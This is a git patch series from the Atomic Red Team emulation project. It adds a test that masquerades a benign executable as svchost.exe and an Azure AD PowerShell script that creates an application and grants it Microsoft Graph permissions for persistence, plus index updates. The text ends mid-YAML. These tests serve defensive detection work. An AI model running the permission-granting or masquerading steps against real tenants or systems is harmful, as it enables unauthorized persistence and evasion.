Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7f43ff3c..73650152 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -466,6 +466,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
 defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 68768806..3a1e2069 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -298,6 +298,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 23251a3a..ff1fcce3 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -738,6 +738,7 @@
   - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
 - [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
   - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 63f0ddce..ec79cb1c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -507,7 +507,8 @@
 - [T1036 Masquerading](../../T1036/T1036.md)
   - Atomic Test #1: System File Copied to Unusual Location [windows]
   - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 596c3fd9..cf4b2f95 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -60,7 +60,7 @@
 |  |  | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f46f0ba2..3f4028e3 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31192,6 +31192,36 @@ defense-evasion:
         cleanup_command: |
           rm -f $HOME/.../sh
           rmdir $HOME/.../
+    - name: Masquerade as a built-in system executable
+      auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+      description: 'Launch an executable that attempts to masquerade as a legitimate
+        executable.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        executable_filepath:
+          description: File path where the generated executable will be dropped and
+            executed from. The filename should be the name of a built-in system utility.
+          type: String
+          default: "$Env:windir\\Temp\\svchost.exe"
+      executor:
+        command: |
+          Add-Type -TypeDefinition @'
+          public class Test {
+              public static void Main(string[] args) {
+                  System.Console.WriteLine("tweet, tweet");
+              }
+          }
+          '@ -OutputAssembly "#{executable_filepath}"
+
+          Start-Process -FilePath "#{executable_filepath}"
+        cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
+          Ignore
+
+'
+        name: powershell
   T1556:
     technique:
       external_references:
diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md
index 906ddca2..1d369e9b 100644
--- a/atomics/T1036.005/T1036.005.md
+++ b/atomics/T1036.005/T1036.005.md
@@ -8,6 +8,8 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
 
 - [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
 
+- [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)
+
 
 <br/>
 
@@ -48,4 +50,49 @@ rmdir $HOME/.../
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Masquerade as a built-in system executable
+Launch an executable that attempts to masquerade as a legitimate executable.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | String | $Env:windir&#92;Temp&#92;svchost.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Add-Type -TypeDefinition @'
+public class Test {
+    public static void Main(string[] args) {
+        System.Console.WriteLine("tweet, tweet");
+    }
+}
+'@ -OutputAssembly "#{executable_filepath}"
+
+Start-Process -FilePath "#{executable_filepath}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

From 2be981e92d43f790af6c3f54c0a81ce5b3a51f50 Mon Sep 17 00:00:00 2001
From: WojciechLesicki <wojciech.lesicki@gmail.com>
Date: Sun, 6 Mar 2022 18:49:31 +0100
Subject: [PATCH 04/83] I added another atomic related to adding permission to
 the application in AzureAD.

---
 atomics/T1098/T1098.md   | 103 +++++++++++++++++++++++++++++++++++++++
 atomics/T1098/T1098.yaml |  88 +++++++++++++++++++++++++++++++++
 2 files changed, 191 insertions(+)

diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index 08ccbe36..e7d4a010 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -18,6 +18,8 @@
 
 - [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription)
 
+- [Atomic Test #8 - Azure - adding permission to application](#atomic-test-8---azure---adding-permission-to-application)
+
 
 <br/>
 
@@ -504,3 +506,104 @@ Install-Module -Name Az.Resources -Force
 
 <br/>
 <br/>
+
+## Atomic Test #8 - Azure - adding permission to application
+The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+You can also take a look at the materials:
+https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+https://github.com/reprise99/Sentinel-Queries
+https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+
+**Supported Platforms:** Azure-ad
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| application_name | Name of the targeted application | String | test_app|
+| application_permission | Permission from Microsoft Graph Resource API that will be add to application from  | String | DirectoryRecommendations.Read.All|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+```powershell
+Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
+      $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
+      #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+
+      #Get Service Principal of Microsoft Graph Resource API 
+      $graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
+
+      #Initialize RequiredResourceAccess for Microsoft Graph Resource API 
+      $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
+      $requiredGraphAccess.ResourceAppId = $graphSP.AppId
+      $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
+
+      #Set Application Permissions
+      $ApplicationPermissions = @('#{application_permission}')
+
+      $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
+      if($reqPermission)
+      {
+      $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
+      $resourceAccess.Type = "Role"
+      $resourceAccess.Id = $reqPermission.Id    
+      #Add required app permission
+      $requiredGraphAccess.ResourceAccess.Add($resourceAccess)
+      }
+      else
+      {
+      Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
+      }
+
+      #Add required resource accesses
+      $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
+      $requiredResourcesAccess.Add($requiredGraphAccess)
+
+      #Set permissions in existing Azure AD App
+      Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
+
+      $servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
+
+      New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+      Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+```
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+<br/>
+<br/>
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index b615e766..73531f8d 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -411,3 +411,91 @@ atomic_tests:
       Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
     name: powershell
     elevation_required: false
+
+- name: Azure - adding permission to application
+  description: |
+    The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    application_name:
+      description: Name of the targed application
+      type: String
+      default: test_app
+    application_permission:
+      description: Permission from Microsoft Graph Resource API that will be add to application
+      type: String
+      default: DirectoryRecommendations.Read.All
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
+      $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
+      #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+
+      #Get Service Principal of Microsoft Graph Resource API 
+      $graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
+
+      #Initialize RequiredResourceAccess for Microsoft Graph Resource API 
+      $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
+      $requiredGraphAccess.ResourceAppId = $graphSP.AppId
+      $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
+
+      #Set Application Permissions
+      $ApplicationPermissions = @('#{application_permission}')
+
+      $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
+      if($reqPermission)
+      {
+      $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
+      $resourceAccess.Type = "Role"
+      $resourceAccess.Id = $reqPermission.Id    
+      #Add required app permission
+      $requiredGraphAccess.ResourceAccess.Add($resourceAccess)
+      }
+      else
+      {
